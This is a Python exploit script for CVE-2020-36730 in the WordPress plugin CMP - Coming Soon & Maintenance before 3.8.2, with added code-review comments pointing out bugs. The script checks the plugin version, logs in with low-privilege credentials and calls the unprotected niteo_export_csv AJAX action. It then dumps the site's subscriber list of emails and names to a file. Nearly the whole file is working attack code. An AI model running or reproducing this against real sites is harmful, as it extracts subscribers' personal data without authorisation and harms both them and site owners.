#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os
## Exploit script by @RandomRobbieBF
# Proxy placeholder. Both variables are exported empty, which overwrites any
# HTTP_PROXY / HTTPS_PROXY already present in the caller's environment.
# NOTE(review): presumably requests/urllib ignore an empty proxy value, so this
# is a no-op until a URL is put here — confirm.
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
# User-Agent used only by the login request in vulncheck(); check_plugin_version()
# and the export request each carry their own hard-coded, different strings.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def check_plugin_version(url: str, username: str | None, password: str) -> str:
    """Read the plugin's public readme.txt and report whether the install looks affected.

    Fetches ``<url>/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt``,
    takes the ``Stable tag:`` line and compares its value with "3.8.2".

    Args:
        url: Site base URL without a trailing slash (the path is appended as-is).
        username: Unused; accepted only so the signature mirrors vulncheck().
        password: Unused; see ``username``.

    Returns:
        The parsed version string, only when it is judged to be below 3.8.2.
        Every other outcome (readme not served with HTTP 200, no ``Stable tag:``
        line, version judged at or above 3.8.2) prints a message and terminates
        the whole process via ``exit()`` instead of returning.
    """
    # A third, separate User-Agent; the module-level ``user_agent`` is not reused here.
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
    plugin_url = ""+url+"/wp-content/plugins/cmp-coming-soon-maintenance/readme.txt"
    # NOTE(review): verify=False disables TLS certificate verification for this
    # request (vulncheck() leaves verification at its default, so the two disagree);
    # urllib3 typically emits an InsecureRequestWarning for each such call.
    response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
    if response.status_code == 200:
        content = response.text
        # First line beginning with "Stable tag:", or None when absent.
        # NOTE(review): a site that answers unknown paths with a 200 "not found"
        # page lands here too and is then reported as "Failed to find the version".
        version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
        if version_line:
            version = version_line.split(':')[1].strip()
            # BUG: this is a lexicographic string comparison, not a version
            # comparison — '3.10.0' > '3.8.2' is False, and '3.8.2' itself falls
            # into the else branch although the message says "3.8.2 or above".
            # Compare tuples of ints (split on '.') instead.
            if version > '3.8.2':
                print("The plugin version is 3.8.2 or above.")
                # exit() is the site-module helper; sys.exit() is the conventional choice in scripts.
                exit()
            else:
                print("The plugin version is below 3.8.2.")
                print("The plugin version is "+version+"")
                return version
        else:
            print("Failed to find the version information in the readme.txt file.")
            exit()
    else:
        # Any non-200 status (including 403 for a blocked readme) is treated as "not installed".
        print("Plugin not installed")
        exit()
def vulncheck(url: str, username: str | None, password: str) -> None:
    """Log in to WordPress and call the plugin's CSV-export AJAX action.

    Posts the credentials to ``wp-login.php`` on a requests Session, treats the
    presence of a ``wordpress_logged_in`` cookie on the session as a successful
    login, then POSTs ``action=niteo_export_csv`` to ``admin-ajax.php``. When the
    response contains the expected CSV header it is printed and written to
    ``emails.csv`` in the current working directory.

    Args:
        url: Site base URL without a trailing slash.
        username: WordPress login name (None when ``--username`` was omitted).
        password: WordPress password.

    Returns:
        None. Every outcome is reported via print() only; the caller gets no
        success/failure signal and nothing is raised.
    """
    # Perform vulnerability check logic here
    print("Vulnerability check:", url)
    # Login to WordPress
    login_url = f"{url}/wp-login.php"
    # The Session carries the cookies set by the login response into the export request.
    session = requests.Session()
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{url}/wp-admin/",
    }
    try:
        # NOTE(review): no timeout here (check_plugin_version() uses timeout=30),
        # so an unresponsive host can block indefinitely.
        login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
        # Only HTTP-level failures are caught here; a rejected login presumably
        # still answers 200 with the form, which is why the cookie check follows.
        login_response.raise_for_status()
        # Extract the required cookies from the response headers
        # NOTE(review): ``cookies`` is never used; the check below reads session.cookies.
        cookies = login_response.cookies
        # Confirm successful login
        # NOTE(review): there is no else branch — a login that sets no
        # wordpress_logged_in cookie produces no output at all.
        if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
            print("Logged in successfully.")
            try:
                paramsPost = {"action":"niteo_export_csv"}
                headers = {"Origin":url,"Accept":"*/*","X-Requested-With":"XMLHttpRequest","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0","Referer":""+url+"/wp-admin/admin.php?page=cmp-subscribers","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate, br","Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
                # No nonce is sent with the action; the response is judged solely by its CSV header.
                response = session.post(""+url+"/wp-admin/admin-ajax.php", data=paramsPost, headers=headers)
                if "ID,Date,Email,Firstname,Lastname,Fullname" in response.text:
                    print("\n\n")
                    print(response.text)
                    # NOTE(review): overwrites emails.csv in the cwd without a
                    # with-block or explicit encoding; if write() raises, the
                    # handle is never closed.
                    text_file = open("emails.csv", "w+")
                    text_file.write(response.text)
                    text_file.close()
                else:
                    print("Failed to extract CSV")
            # NOTE(review): bare except; any failure in the export step (network
            # error, encoding error, file error) is reported as "Failed to Login",
            # which is misleading. Narrow to requests.RequestException / OSError
            # and print the exception.
            except:
                print("Failed to Login")
    # NOTE(review): bare except swallows the real cause of a login failure
    # (connection errors, HTTP errors from raise_for_status, KeyboardInterrupt).
    except:
        print("There was an error")
# Add the vulnerability description as a comment
# Vulnerability description; despite the comment above it is a module-level
# string, used as the argparse --help description.
DESCRIPTION = """
CMP - Coming Soon & Maintenance < 3.8.2 - Improper Access Controls on AJAX Calls (Subscriber+)
Description:
Some of the AJAX calls from the plugin do not properly check for capabilities and CSRF tokens, leading to issues such as arbitrary post read, subscribers list export and plugin deactivation.
CVE-2020-36730
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
# NOTE(review): --username is optional, yet both calls below depend on it; when
# omitted, the login form is posted with log=None (presumably dropped by requests,
# after which the login cannot succeed — confirm). Consider required=True.
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
args = parser.parse_args()
# Prompt for password if not provided as an argument, so it need not appear on
# the command line (shell history, process listings).
if not args.password:
    args.password = getpass("Enter the WordPress password: ")
# check_plugin_version() calls exit() itself on every outcome other than
# "version below 3.8.2", so vulncheck() only runs for installs it judged affected.
check_plugin_version(args.url, args.username,args.password)
vulncheck(args.url, args.username, args.password)
# NOTE(review): no ``if __name__ == "__main__":`` guard — importing this module
# parses sys.argv and runs the whole flow.